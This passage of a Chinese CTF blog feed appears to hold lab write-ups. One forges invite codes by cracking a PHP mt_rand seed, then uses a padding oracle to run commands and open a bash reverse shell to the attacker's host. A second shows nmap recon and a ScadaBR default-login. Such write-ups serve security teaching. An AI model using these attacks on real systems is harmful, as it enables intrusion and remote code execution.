 (_||| _) (/_(_|| (_| )

Extensions: html, php | HTTP method: GET | Threads: 25 | Wordlist size: 43003

Output File: /root/wrk/reports/http_10.65.160.45_1337/_26-09-18_14-21-05.txt

Target: http://10.65.160.45:1337/

[14:21:05] Starting: 
[14:21:05] 403 -  279B  - /.html
[14:21:05] 403 -  279B  - /.php
[14:21:05] 301 -  317B  - /css  -&gt;  http://10.65.160.45:1337/css/
Added to the queue: css/
[14:21:05] 403 -  279B  - /.htm
[14:21:06] 301 -  318B  - /logs  -&gt;  http://10.65.160.45:1337/logs/
Added to the queue: logs/
[14:21:06] 301 -  316B  - /js  -&gt;  http://10.65.160.45:1337/js/
Added to the queue: js/
[14:21:07] 301 -  324B  - /javascript  -&gt;  http://10.65.160.45:1337/javascript/
Added to the queue: javascript/
[14:21:09] 301 -  324B  - /phpmyadmin  -&gt;  http://10.65.160.45:1337/phpmyadmin/
Added to the queue: phpmyadmin/
</code></pre>
<p>有一个有趣的目录: <code>logs</code></p>
<h3>logs</h3>
<p><img src="./log.png" alt="logs" /></p>
<pre><code>2025-01-23 14:32:56 - User POST to /index.php (Login attempt)
2025-01-23 14:33:01 - User POST to /index.php (Login attempt)
2025-01-23 14:33:05 - User GET /index.php (Login page access)
2025-01-23 14:33:15 - User POST to /index.php (Login attempt)
2025-01-23 14:34:20 - User POST to /index.php (Invite created, code: MTM0ODMzNzEyMg== for alpha@fake.thm)
2025-01-23 14:35:25 - User GET /index.php (Login page access)
2025-01-23 14:36:30 - User POST to /dashboard.php (User alpha@fake.thm deactivated)
2025-01-23 14:37:35 - User GET /login.php (Page not found)
2025-01-23 14:38:40 - User POST to /dashboard.php (New user created: hello@fake.thm)
</code></pre>
<p>两个用户:</p>
<ol>
<li><code>alpha@fake.thm</code>, 邀请码: <code>MTM0ODMzNzEyMg==</code></li>
<li><code>hello@fake.thm</code>, 没有对应邀请码</li>
</ol>
<p>邀请码是 base64 格式</p>
<pre><code>echo 'MTM0ODMzNzEyMg=='|base64 -d
1348337122
</code></pre>
<p>尝试以 <code>alpha@fake.thm</code> 登录, 显示账户已经被 <code>deactivated</code>
<img src="./deactivated.png" alt="logintry" /></p>
<h2><code>/js/api.js</code> Analyse</h2>
<p>在登录页的源代码中找到该文件, 打开后是经过混淆的JS代码</p>
<pre><code>function b(c,d){const e=a();return b=function(f,g){f=f-0x165;let h=e[f];return h;},b(c,d);}const j=b;function a(){const k=['16OTYqOr','861cPVRNJ','474AnPRwy','H7gY2tJ9wQzD4rS1','5228dijopu','29131EDUYqd','8756315tjjUKB','1232020YOKSiQ','7042671GTNtXE','1593688UqvBWv','90209ggCpyY'];a=function(){return k;};return a();}(function(d,e){const i=b,f=d();while(!![]){try{const g=parseInt(i(0x16b))/0x1+-parseInt(i(0x16f))/0x2+parseInt(i(0x167))/0x3*(parseInt(i(0x16a))/0x4)+parseInt(i(0x16c))/0x5+parseInt(i(0x168))/0x6*(parseInt(i(0x165))/0x7)+-parseInt(i(0x166))/0x8*(parseInt(i(0x16e))/0x9)+parseInt(i(0x16d))/0xa;if(g===e)break;else f['push'](f['shift']());}catch(h){f['push'](f['shift']());}}}(a,0xe43f0));const c=j(0x169);
</code></pre>
<p>在在线网站反混淆后得到</p>
<pre><code>function b(c, d) {
  const e = a();
  return b = function (f, g) {
    f = f - 357;
    let h = e[f];
    return h;
  }, b(c, d);
}
const j = b;
function a() {
  const k = ["16OTYqOr", "861cPVRNJ", "474AnPRwy", "H7gY2tJ9wQzD4rS1", "5228dijopu", "29131EDUYqd", "8756315tjjUKB", "1232020YOKSiQ", "7042671GTNtXE", "1593688UqvBWv", "90209ggCpyY"];
  a = function () {
    return k;
  };
  return a();
}
(function (d, e) {
  const i = b, f = d();
  while (true) {
    try {
      const g = parseInt(i(363)) / 1 + -parseInt(i(367)) / 2 + parseInt(i(359)) / 3 * (parseInt(i(362)) / 4) + parseInt(i(364)) / 5 + parseInt(i(360)) / 6 * (parseInt(i(357)) / 7) + -parseInt(i(358)) / 8 * (parseInt(i(366)) / 9) + parseInt(i(365)) / 10;
      if (g === e) break; else f.push(f.shift());
    } catch (h) {
      f.push(f.shift());
    }
  }
}(a, 934896));
const c = j(361);
</code></pre>
<p>投喂 AI 后其指出该代码最终会将 <code>c</code> 赋值为 <code>H7gY2tJ9wQzD4rS1</code></p>
<h2>Access to API document</h2>
<p>目前我们只有一串神奇小代码, 没有用户名或邮箱, 考虑只需要密码的 API 文档:
<img src="./apidoc.png" alt="apidocs" /></p>
<p>得到用于生成邀请码的 PHP 代码:</p>
<pre><code>// Token generation example
function calculate_seed_value($email, $constant_value) {
    $email_length = strlen($email);
    $email_hex = hexdec(substr($email, 0, 8));
    $seed_value = hexdec($email_length + $constant_value + $email_hex);

    return $seed_value;
}
$seed_value = calculate_seed_value($email, $constant_value);
mt_srand($seed_value);
$random = mt_rand();
$invite_code = base64_encode($random);
</code></pre>
<p>其使用 <code>mt_rand()</code> 以 <code>$seed_value</code> 为种子生成随机数, 将随机数 base64 编码作为邀请码, 对于 <code>mt_rand()</code>, 其是一个伪随机数生成器, 但可以被破解, 需要一个已知的邀请码.</p>
<p>其中种子的生成依据三个两个变量: <code>email</code> 以及 <code>constant</code>, 其中我们已经拥有 email.</p>
<p>回顾上文, 我们恰好拥有一个邀请码: <code>MTM0ODMzNzEyMg==</code>, 对应 <code>mt_rand()</code> 结果 <code>1348337122</code></p>
<h3>crack seed and reverse constant</h3>
<p>::github{repo="openwall/php_mt_seed"}</p>
<pre><code>./php_mt_seed 1348337122
Pattern: EXACT
Version: 3.0.7 to 5.2.0
Found 0, trying 0xfc000000 - 0xffffffff, speed 270.7 Mseeds/s
Version: 5.2.1+
Found 0, trying 0x00000000 - 0x01ffffff, speed 0.0 Mseeds/s
seed = 0x00143783 = 1324931 (PHP 7.1.0+)
Found 1, trying 0x0e000000 - 0x0fffffff, speed 3.1 Mseeds/s
</code></pre>
<p>得到 <code>$seed_value</code>: <code>1324931</code></p>
<pre><code>&lt;?php

declare(strict_types=1);

/**
 * Recover the numeric constant from the seed formula:
 *
 *   $seed = hexdec(
 *       strlen($email) +
 *       $constant_value +
 *       hexdec(substr($email, 0, 8))
 *   );
 *
 * Usage:
 *   php recover-constant.php &lt;email&gt; &lt;seed&gt;
 */

function calculate_seed_value(string $email, int $constantValue): int|float
{
    $emailLength = strlen($email);
    $emailHex = @hexdec(substr($email, 0, 8));
    $combined = $emailLength + $constantValue + $emailHex;

    return hexdec((string) $combined);
}

function recover_constant_value(string $email, int $seed): int
{
    if ($seed &lt; 0) {
        throw new InvalidArgumentException('The seed must be a non-negative integer.');
    }

    /*
     * The original code converts the decimal sum to a string and interprets
     * that string as hexadecimal. Therefore dechex($seed) must reproduce the
     * original decimal digit string.
     */
    $combinedString = dechex($seed);

    if (!preg_match('/^[0-9]+$/', $combinedString)) {
        throw new RuntimeException(
            "No exact decimal value can produce seed {$seed}: " .
            "its hexadecimal form contains non-decimal digits ({$combinedString})."
        );
    }

    $combinedValue = (int) $combinedString;
    $emailLength = strlen($email);
    $emailHex = @hexdec(substr($email, 0, 8));

    return $combinedValue - $emailLength - $emailHex;
}

if ($argc !== 3) {
    fwrite(STDERR, "Usage: php recover-constant.php &lt;email&gt; &lt;seed&gt;\n");
    exit(1);
}

[$script, $email, $seedInput] = $argv;

if (!preg_match('/^\d+$/', $seedInput)) {
    fwrite(STDERR, "Error: seed must be a non-negative integer.\n");
    exit(1);
}

try {
    $seed = (int) $seedInput;
    $constant = recover_constant_value($email, $seed);
    $verifiedSeed = calculate_seed_value($email, $constant);

    echo "email:          {$email}\n";
    echo "email length:   " . strlen($email) . "\n";
    echo "email hex:      " . @hexdec(substr($email, 0, 8)) . "\n";
    echo "seed:           {$seed}\n";
    echo "constant value: {$constant}\n";
    echo "verified seed:  {$verifiedSeed}\n";

    if ((int) $verifiedSeed !== $seed) {
        fwrite(STDERR, "Warning: recovered value did not reproduce the seed exactly.\n");
        exit(2);
    }
} catch (Throwable $error) {
    fwrite(STDERR, "Error: {$error-&gt;getMessage()}\n");
    exit(1);
}
</code></pre>
<p>让 AI 搓了一个小脚本, 得到常量:</p>
<pre><code>php recover-constant.php alpha@fake.thm 1324931
email:          alpha@fake.thm
email length:   14
email hex:      43770
seed:           1324931
constant value: 99999
verified seed:  1324931
</code></pre>
<h2>login as hello@fake.thm</h2>
<p>那么生成 <code>hello@fake.thm</code> 就很方便了:</p>
<pre><code>// Token generation example
function calculate_seed_value($email, $constant_value) {
    $email_length = strlen($email);
    $email_hex = hexdec(substr($email, 0, 8));
    $seed_value = hexdec($email_length + $constant_value + $email_hex);

    return $seed_value;
}
$seed_value = calculate_seed_value("hello@fake.thm", 99999);
mt_srand($seed_value);
$random = mt_rand();
$invite_code = base64_encode($random);
echo $invite_code
</code></pre>
<p>得到邀请码: <code>NDYxNTg5ODkx</code></p>
<p><img src="./dashboard.png" alt="dashboaed" />
看上去没什么新功能, 但给出了一个新邮箱: <code>admin@fake.thm</code>, 且指出当前用户角色为 user, <code>admin@fake.thm</code> 角色为 <code>admin</code>.
生成 admin 的邀请码: <code>MTc0OTQ0NzAzNw==</code></p>
<h3>login as admin@fake.thm?</h3>
<p>看着很棒, 对把. 但是, 不行.
<img src="./fail.png" alt="fail" /></p>
<h2>padding oracle and RCE</h2>
<p>查看页面源代码:</p>
<pre><code>&lt;!DOCTYPE html&gt;
&lt;html lang="en"&gt;
&lt;head&gt;
    &lt;meta charset="UTF-8"&gt;
    &lt;meta name="viewport" content="width=device-width, initial-scale=1.0"&gt;
    &lt;title&gt;Dashboard&lt;/title&gt;
    &lt;link href="/css/bootstrap.min.css" rel="stylesheet"&gt;
&lt;/head&gt;
&lt;body&gt;
    &lt;header class="bg-primary text-white text-center py-3"&gt;
        &lt;h1&gt;Dashboard&lt;/h1&gt;
    &lt;/header&gt;
    &lt;main class="container my-5"&gt;
        &lt;h2&gt;Welcome, hello@fake.thm! - Flag: THM{CryptographyPwn007}&lt;/h2&gt;
        &lt;a href="?action=logout" class="btn btn-danger"&gt;Logout&lt;/a&gt;
        &lt;table class="table mt-4"&gt;
            &lt;thead&gt;
                &lt;tr&gt;
                    &lt;th&gt;Username&lt;/th&gt;
                    &lt;th&gt;Role&lt;/th&gt;
                &lt;/tr&gt;
            &lt;/thead&gt;
            &lt;tbody&gt;
                &lt;tr&gt;
                    &lt;td&gt;hello@fake.thm&lt;/td&gt;
                    &lt;td&gt;user&lt;/td&gt;
                &lt;/tr&gt;
                &lt;tr&gt;
                    &lt;td&gt;admin@fake.thm&lt;/td&gt;
                    &lt;td&gt;admin&lt;/td&gt;
                &lt;/tr&gt;
            &lt;/tbody&gt;
        &lt;/table&gt;
    &lt;/main&gt;
    &lt;footer class="bg-light text-center py-3"&gt;
        &lt;p&gt;&amp;copy;  &lt;strong&gt;2026
&lt;/strong&gt; Decryptify&lt;/p&gt;
        &lt;form method="get"&gt;
            &lt;input type="hidden" name="date" value="ID4Q/0Q2drIZLi8kL9HnzuPA2600r1+s6fuRkuD8U7M="&gt;
        &lt;/form&gt;
    &lt;/footer&gt;
&lt;/body&gt;
&lt;/html&gt;
</code></pre>
<p>有一个隐藏的参数 <code>date</code>, 默认值看上去像 base64, 但这次无法解出明文:</p>
<pre><code>echo 'ID4Q/0Q2drIZLi8kL9HnzuPA2600r1+s6fuRkuD8U7M='|base64 -d|xxd
00000000: 203e 10ff 4436 76b2 192e 2f24 2fd1 e7ce   &gt;..D6v.../$/...
00000010: e3c0 dbad 34af 5fac e9fb 9192 e0fc 53b3  ....4._.......S.
</code></pre>
<p>按照值输入参数后页面上出现了一条错误信息:</p>
<pre><code>© Padding error: error:0606506D:digital envelope routines:EVP_DecryptFinal_ex:wrong final block length
</code></pre>
<p>这意味着我们正在攻击一个 ==Padding Oracle=={.tip}, 填充预言机, <a href="https://tlseminar.github.io/padding-oracle/">这篇文章</a>介绍了攻击原理. 为了节省一些寿命, 这里选择自动化工具.</p>
<p>::github{repo="glebarez/padre"}</p>
<pre><code>padre  -u 'http://10.65.160.45:1337/dashboard.php?date=$' -cookie "PHPSESSID=vpa4jp62n7re0852fssvdafl4l; role=d057af5933d8acebfe290fe2bbd540e08a2a81a22eff55969a89a7dbe84fb98cd6cbda066ed79220eba70afb9b3d4e0d" "ID4Q/0Q2drIZLi8kL9HnzuPA2600r1+s6fuRkuD8U7M="
[i] padre is on duty
[i] using concurrency (http connections): 30
[+] successfully detected padding oracle
[+] detected block length: 8
[!] mode: decrypt
[1/1] date +%Y\x08\x08\x08\x08\x08\x08\x08\x08\... [24/24] | reqs: 3298 (0/sec)
</code></pre>
<p>其解密后的数据为 <code>date +%Y</code>, 后面为 <code>padding</code>, 尝试获取 shell
:::caution
该工具给出的 base64 编码后的结果可能包含一些 url 敏感字符
:::</p>
<pre><code>padre  -u 'http://10.65.160.45:1337/dashboard.php?date=$' -cookie "PHPSESSID=vpa4jp62n7re0852fssvdafl4l; role=d057af5933d8acebfe290fe2bbd540e08a2a81a22eff55969a89a7dbe84fb98cd6cbda066ed79220eba70afb9b3d4e0d"  -enc "/bin/bash -c '/bin/bash -i &gt;&amp; /dev/tcp/10.65.95.88/4444 0&gt;&amp;1'"
[i] padre is on duty
[i] using concurrency (http connections): 30
[+] successfully detected padding oracle
[+] detected block length: 8
[!] mode: encrypt
[1/1] 9hw66HuQxtJsQldH2s5sGg3BwkS2TLLBtamEHJJQMQjtZlnwC/QatXxFUjbVO+uZs9hEkMc3YY7JM8gF/6QLnWVuZWVlYm5l                                                                                         [72/72] | reqs: 9813 (3271/sec)
root@ip-10-65-95-88:~/wrk# nc -lvvnp 4444
Listening on 0.0.0.0 4444
Connection received on 10.65.160.45 34988
bash: cannot set terminal process group (668): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ip-10-65-160-45:/var/www/html$ whoami
whoami
www-data
www-data@ip-10-65-160-45:/var/www/html$ cat /home/ubuntu/flag.txt
cat /home/ubuntu/flag.txt
THM{GOT_COMMAND_EXECUTION001}
</code></pre>
<h1>beyond the flag</h1>
<pre><code>?php
session_start();
error_reporting(E_ALL);
ini_set('display_errors', 1);
$key = "1234567890abcdef"; // Same 16-byte key
$pass = 'tryhack1';
$str = "";

// Functions for encryption and decryption
function encryptString($unencryptedText, $passphrase) {
    $iv = random_bytes(openssl_cipher_iv_length('DES-CBC')); // DES block size is 8 bytes
    $text = pad($unencryptedText, 8); // Keep PKCS5 padding
    $enc = openssl_encrypt($text, 'DES-CBC', $passphrase, OPENSSL_RAW_DATA, $iv); 

    if ($enc === false) {
        die("Encryption failed: " . openssl_error_string());
    }

    return base64_encode($iv . $enc);
}

function decryptString($encryptedText, $passphrase) {
    $encrypted = base64_decode($encryptedText); 
    $iv_size = openssl_cipher_iv_length('DES-CBC'); // Get IV size for DES-CBC
    $iv = substr($encrypted, 0, $iv_size); // Extract the IV
    $ciphertext = substr($encrypted, $iv_size); // Extract the actual ciphertext

    $dec = openssl_decrypt($ciphertext, 'DES-CBC', $passphrase, OPENSSL_RAW_DATA, $iv); // Decrypt the ciphertext
	
    if ($dec === false) {
		http_response_code(400);
        return "Padding error: " . openssl_error_string();
    }

    $str = unpad($dec); // Remove padding
    if ($str === false) {
		http_response_code(400);
        echo "Invalid padding" . $str;
        die();
    } else {
        return $str;
    }
}

function pad($text, $blocksize) {
    $pad = $blocksize - (strlen($text) % $blocksize);
    return $text . str_repeat(chr($pad), $pad);
}

function unpad($text) {
    if (empty($text)) {
        return false; // Invalid input
    }

    $pad = ord($text[strlen($text) - 1]); // Get the value of the last byte

    // If the padding byte value is out of range, treat as unpadded output
    if ($pad &lt; 1 || $pad &gt; strlen($text)) {
        return $text; // No padding detected, return original text
    }

    // Check if the last $pad bytes are all equal to $pad
    if (substr($text, -$pad) !== str_repeat(chr($pad), $pad)) {
        return $text; // Assume it's unpadded if padding is invalid
    }

    // Valid padding, remove it
    return substr($text, 0, -1 * $pad);
}

if (!isset($_SESSION['username']) ) {
    // If no session exists, redirect to login
	 header("Location: logout.php");
}

// Logout logic
if (isset($_GET['action']) &amp;&amp; $_GET['action'] === 'logout') {
    session_destroy();
    setcookie("secure", "", time() - 3600, "/"); // Expire the secure cookie
    setcookie("role", "", time() - 3600, "/"); // Expire the role cookie
    header("Location: index.php");
    exit;
}

$comm ="";
$output = "";
if (isset($_GET['date'])) {
	$comm = $_GET['date'];
	$resp = decryptString($_GET['date'], $pass);
	//echo $resp;
	if (strpos($resp, 'Padding error:')!== false)
	{
		$output = $resp;
	}
	else{
		 $command = $_GET['date'];
      $output = shell_exec($resp);
	}

	//echo "command: ". $resp;
	//echo "command is". $resp;
	//if(isValidCommand($resp)){
	 
	//}
	//else{
	//$output = "invalid command";
	//}

}
else{
	$command = "date +%Y";
	//$command = "cat /home/ubuntu/flag.txt";
	$comm = encryptString($command, $pass);

	 $output = shell_exec($command);

}


function isValidCommand($command) {
    $output = shell_exec("command -v " . escapeshellarg($command) . " 2&gt;/dev/null");
    return !empty($output);
}

if (isset($_SESSION['username']) ) {
?&gt;

&lt;!DOCTYPE html&gt;
&lt;html lang="en"&gt;
&lt;head&gt;
    &lt;meta charset="UTF-8"&gt;
    &lt;meta name="viewport" content="width=device-width, initial-scale=1.0"&gt;
    &lt;title&gt;Dashboard&lt;/title&gt;
    &lt;link href="/css/bootstrap.min.css" rel="stylesheet"&gt;
&lt;/head&gt;
&lt;body&gt;
    &lt;header class="bg-primary text-white text-center py-3"&gt;
        &lt;h1&gt;Dashboard&lt;/h1&gt;
    &lt;/header&gt;
    &lt;main class="container my-5"&gt;
        &lt;h2&gt;Welcome, &lt;?php echo htmlspecialchars($_SESSION['username']); ?&gt;! - Flag: THM{CryptographyPwn007}&lt;/h2&gt;
        &lt;a href="?action=logout" class="btn btn-danger"&gt;Logout&lt;/a&gt;
        &lt;table class="table mt-4"&gt;
            &lt;thead&gt;
                &lt;tr&gt;
                    &lt;th&gt;Username&lt;/th&gt;
                    &lt;th&gt;Role&lt;/th&gt;
                &lt;/tr&gt;
            &lt;/thead&gt;
            &lt;tbody&gt;
                &lt;tr&gt;
                    &lt;td&gt;hello@fake.thm&lt;/td&gt;
                    &lt;td&gt;user&lt;/td&gt;
                &lt;/tr&gt;
                &lt;tr&gt;
                    &lt;td&gt;admin@fake.thm&lt;/td&gt;
                    &lt;td&gt;admin&lt;/td&gt;
                &lt;/tr&gt;
            &lt;/tbody&gt;
        &lt;/table&gt;
    &lt;/main&gt;
    &lt;footer class="bg-light text-center py-3"&gt;
        &lt;p&gt;&amp;copy;  &lt;strong&gt;&lt;?php echo htmlspecialchars($output); ?&gt;&lt;/strong&gt; Decryptify&lt;/p&gt;
        &lt;form method="get"&gt;
            &lt;input type="hidden" name="date" value="&lt;?php echo $comm; ?&gt;"&gt;
        &lt;/form&gt;
    &lt;/footer&gt;
&lt;/body&gt;
&lt;/html&gt;
&lt;?php
}
else{
	 header("Location: logout.php");

}
</code></pre>
<p>其使用 DES-CBC 方式进行加密, 其是一种分组密码, 每个块在加密前都会与前一个块的密文进行异或. 类似于选择明文攻击, 如果可以在加密前进行填充(输入):</p>
<pre><code>function pad($text, $blocksize) {
    $pad = $blocksize - (strlen($text) % $blocksize);
    return $text . str_repeat(chr($pad), $pad);
}
$text = pad($unencryptedText, 8);
</code></pre>
<p>我们确实可以控制加密前的数据.</p>
]]></content>
    <author><name>0x5t4ckc47</name></author>
    <category term="THM-writeup"/>
  </entry>
  <entry>
    <title>Brr-thm</title>
    <link href="https://0x5t4ckc47.github.io/posts/brr-thm/brr/" rel="alternate" type="text/html"/>
    <id>https://0x5t4ckc47.github.io/posts/brr-thm/brr/</id>
    <published>2026-09-16T00:00:00.000Z</published>
    <updated>2026-09-16T00:00:00.000Z</updated>
    <summary>感觉蛮好玩的</summary>
    <content type="html"><![CDATA[<h1>recon</h1>
<pre><code>root@ip-10-65-71-155:~/wrk# nmap -sSCV -p22,80,5901,8080 -T4  --min-rate 1000 --max-rate 1500 -vv -oN ./ports -Pn 10.65.159.206
PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 64 OpenSSH 9.6p1 Ubuntu 3ubuntu13.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 49:b9:d3:e8:7c:71:ea:a5:fb:e9:ed:4a:59:75:e6:94 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBEQmiDrDh7VoSOfusMPhIS5ONI5TNWr7Z5D2zMAackdmoJElvA2NuLsuWMHZU0D2PegLgv7l163LsuhaA2FBk5k=
|   256 9d:4e:db:52:4d:8b:47:83:cd:78:d6:7d:46:d8:b5:2f (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMDONq3nuOuthoLjtOs0SpQ+0AFnI6B3cA7xb3WzPaLz
80/tcp   open  http    syn-ack ttl 64 WebSockify Python/3.12.3
|_http-title: Error response
|_http-server-header: WebSockify Python/3.12.3
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 405 Method Not Allowed
|     Server: WebSockify Python/3.12.3
|     Date: Wed, 16 Sep 2026 12:26:38 GMT
|     Connection: close
|     Content-Type: text/html;charset=utf-8
|     Content-Length: 355
|     &lt;!DOCTYPE HTML&gt;
|     &lt;html lang="en"&gt;
|     &lt;head&gt;
|     &lt;meta charset="utf-8"&gt;
|     &lt;title&gt;Error response&lt;/title&gt;
|     &lt;/head&gt;
|     &lt;body&gt;
|     &lt;h1&gt;Error response&lt;/h1&gt;
|     &lt;p&gt;Error code: 405&lt;/p&gt;
|     &lt;p&gt;Message: Method Not Allowed.&lt;/p&gt;
|     &lt;p&gt;Error code explanation: 405 - Specified method is invalid for this resource.&lt;/p&gt;
|     &lt;/body&gt;
|     &lt;/html&gt;
|   HTTPOptions: 
|     HTTP/1.1 501 Unsupported method ('OPTIONS')
|     Server: WebSockify Python/3.12.3
|     Date: Wed, 16 Sep 2026 12:26:38 GMT
|     Connection: close
|     Content-Type: text/html;charset=utf-8
|     Content-Length: 360
|     &lt;!DOCTYPE HTML&gt;
|     &lt;html lang="en"&gt;
|     &lt;head&gt;
|     &lt;meta charset="utf-8"&gt;
|     &lt;title&gt;Error response&lt;/title&gt;
|     &lt;/head&gt;
|     &lt;body&gt;
|     &lt;h1&gt;Error response&lt;/h1&gt;
|     &lt;p&gt;Error code: 501&lt;/p&gt;
|     &lt;p&gt;Message: Unsupported method ('OPTIONS').&lt;/p&gt;
|     &lt;p&gt;Error code explanation: 501 - Server does not support this operation.&lt;/p&gt;
|     &lt;/body&gt;
|     &lt;/html&gt;
|   RTSPRequest: 
|     &lt;!DOCTYPE HTML&gt;
|     &lt;html lang="en"&gt;
|     &lt;head&gt;
|     &lt;meta charset="utf-8"&gt;
|     &lt;title&gt;Error response&lt;/title&gt;
|     &lt;/head&gt;
|     &lt;body&gt;
|     &lt;h1&gt;Error response&lt;/h1&gt;
|     &lt;p&gt;Error code: 400&lt;/p&gt;
|     &lt;p&gt;Message: Bad request version ('RTSP/1.0').&lt;/p&gt;
|     &lt;p&gt;Error code explanation: 400 - Bad request syntax or unsupported method.&lt;/p&gt;
|     &lt;/body&gt;
|_    &lt;/html&gt;
5901/tcp open  vnc     syn-ack ttl 64 VNC (protocol 3.8)
| vnc-info: 
|   Protocol version: 3.8
|   Security types: 
|     VeNCrypt (19)
|     VNC Authentication (2)
|   VeNCrypt auth subtypes: 
|     Unknown security type (2)
|_    VNC auth, Anonymous TLS (258)
8080/tcp open  http    syn-ack ttl 63 Apache Tomcat/Coyote JSP engine 1.1
|_http-server-header: Apache-Coyote/1.1
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: ScadaBR CTF
| http-methods: 
|   Supported Methods: GET HEAD POST PUT DELETE OPTIONS
|_  Potentially risky methods: PUT DELETE
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.94SVN%I=7%D=9/16%Time=6AAA8AFF%P=x86_64-pc-linux-gnu%r(G
SF:etRequest,21C,"HTTP/1\.1\x20405\x20Method\x20Not\x20Allowed\r\nServer:\
SF:x20WebSockify\x20Python/3\.12\.3\r\nDate:\x20Wed,\x2016\x20Sep\x202026\
SF:x2012:26:38\x20GMT\r\nConnection:\x20close\r\nContent-Type:\x20text/htm
SF:l;charset=utf-8\r\nContent-Length:\x20355\r\n\r\n&lt;!DOCTYPE\x20HTML&gt;\n&lt;h
SF:tml\x20lang=\"en\"&gt;\n\x20\x20\x20\x20&lt;head&gt;\n\x20\x20\x20\x20\x20\x20\x
SF:20\x20&lt;meta\x20charset=\"utf-8\"&gt;\n\x20\x20\x20\x20\x20\x20\x20\x20&lt;tit
SF:le&gt;Error\x20response&lt;/title&gt;\n\x20\x20\x20\x20&lt;/head&gt;\n\x20\x20\x20\x20
SF:&lt;body&gt;\n\x20\x20\x20\x20\x20\x20\x20\x20&lt;h1&gt;Error\x20response&lt;/h1&gt;\n\x2
SF:0\x20\x20\x20\x20\x20\x20\x20&lt;p&gt;Error\x20code:\x20405&lt;/p&gt;\n\x20\x20\x20
SF:\x20\x20\x20\x20\x20&lt;p&gt;Message:\x20Method\x20Not\x20Allowed\.&lt;/p&gt;\n\x20
SF:\x20\x20\x20\x20\x20\x20\x20&lt;p&gt;Error\x20code\x20explanation:\x20405\x20
SF:-\x20Specified\x20method\x20is\x20invalid\x20for\x20this\x20resource\.&lt;
SF:/p&gt;\n\x20\x20\x20\x20&lt;/body&gt;\n&lt;/html&gt;\n")%r(HTTPOptions,22D,"HTTP/1\.1\
SF:x20501\x20Unsupported\x20method\x20\('OPTIONS'\)\r\nServer:\x20WebSocki
SF:fy\x20Python/3\.12\.3\r\nDate:\x20Wed,\x2016\x20Sep\x202026\x2012:26:38
SF:\x20GMT\r\nConnection:\x20close\r\nContent-Type:\x20text/html;charset=u
SF:tf-8\r\nContent-Length:\x20360\r\n\r\n&lt;!DOCTYPE\x20HTML&gt;\n&lt;html\x20lang
SF:=\"en\"&gt;\n\x20\x20\x20\x20&lt;head&gt;\n\x20\x20\x20\x20\x20\x20\x20\x20&lt;meta
SF:\x20charset=\"utf-8\"&gt;\n\x20\x20\x20\x20\x20\x20\x20\x20&lt;title&gt;Error\x2
SF:0response&lt;/title&gt;\n\x20\x20\x20\x20&lt;/head&gt;\n\x20\x20\x20\x20&lt;body&gt;\n\x2
SF:0\x20\x20\x20\x20\x20\x20\x20&lt;h1&gt;Error\x20response&lt;/h1&gt;\n\x20\x20\x20\x
SF:20\x20\x20\x20\x20&lt;p&gt;Error\x20code:\x20501&lt;/p&gt;\n\x20\x20\x20\x20\x20\x2
SF:0\x20\x20&lt;p&gt;Message:\x20Unsupported\x20method\x20\('OPTIONS'\)\.&lt;/p&gt;\n\
SF:x20\x20\x20\x20\x20\x20\x20\x20&lt;p&gt;Error\x20code\x20explanation:\x20501\
SF:x20-\x20Server\x20does\x20not\x20support\x20this\x20operation\.&lt;/p&gt;\n\x
SF:20\x20\x20\x20&lt;/body&gt;\n&lt;/html&gt;\n")%r(RTSPRequest,16C,"&lt;!DOCTYPE\x20HTML
SF:&gt;\n&lt;html\x20lang=\"en\"&gt;\n\x20\x20\x20\x20&lt;head&gt;\n\x20\x20\x20\x20\x20\
SF:x20\x20\x20&lt;meta\x20charset=\"utf-8\"&gt;\n\x20\x20\x20\x20\x20\x20\x20\x2
SF:0&lt;title&gt;Error\x20response&lt;/title&gt;\n\x20\x20\x20\x20&lt;/head&gt;\n\x20\x20\x2
SF:0\x20&lt;body&gt;\n\x20\x20\x20\x20\x20\x20\x20\x20&lt;h1&gt;Error\x20response&lt;/h1&gt;
SF:\n\x20\x20\x20\x20\x20\x20\x20\x20&lt;p&gt;Error\x20code:\x20400&lt;/p&gt;\n\x20\x2
SF:0\x20\x20\x20\x20\x20\x20&lt;p&gt;Message:\x20Bad\x20request\x20version\x20\(
SF:'RTSP/1\.0'\)\.&lt;/p&gt;\n\x20\x20\x20\x20\x20\x20\x20\x20&lt;p&gt;Error\x20code\x
SF:20explanation:\x20400\x20-\x20Bad\x20request\x20syntax\x20or\x20unsuppo
SF:rted\x20method\.&lt;/p&gt;\n\x20\x20\x20\x20&lt;/body&gt;\n&lt;/html&gt;\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
</code></pre>
<p>一台 Linux 机器, 四个端口.</p>
<ol>
<li><code>22</code>: ssh, 等找到凭据再来</li>
<li><code>80</code>: <code>WebSockify Python/3.12.3</code>, 但没找到接受的 HTTP 方法</li>
<li><code>5901</code>: VNC</li>
<li><code>8080</code>: 一个 Web 页面</li>
</ol>
<p>除去 <code>8080</code> TTL 均为 64, <code>8080</code> TTL 为 63, 其可能运行在一个代理背后或者容器中</p>
<h1>Web - 8080</h1>
<p><img src="./8080-webman.png" alt="login" /></p>
<p>打开后重定向到 Scadabar 的登陆界面, 对于 Scadabar, 一个模拟工控环境的 app, 其 github 描述如下:
:::note
Open Source, web-based, multi-platform solution for building your own SCADA
(Supervisory Control and Data Acquisition) system.
:::</p>
<p>::github{repo="SCADA-LTS/Scada-LTS"}</p>
<h2>default creds</h2>
<p>根据搜索到的<a href="https://doc-en.rvspace.org/VisionFive2/AN_OpenPLC/VF2OpenPLC/7_2_2_install_scadabr.html">安装手册</a>, Scadabar 的默认密码为: <code>admin/admin</code></p>
<p><img src="./web-afterlogin.png" alt="afterlogin" /></p>
<p>成功登陆, 来到管理页面, 有一个已经没用的 secret, 点击页面上闪烁的 <code>information</code> 得到一些信息, 但没什么有趣的</p>
<p><img src="./info.png" alt="info" /></p>
<h2>datasource</h2>
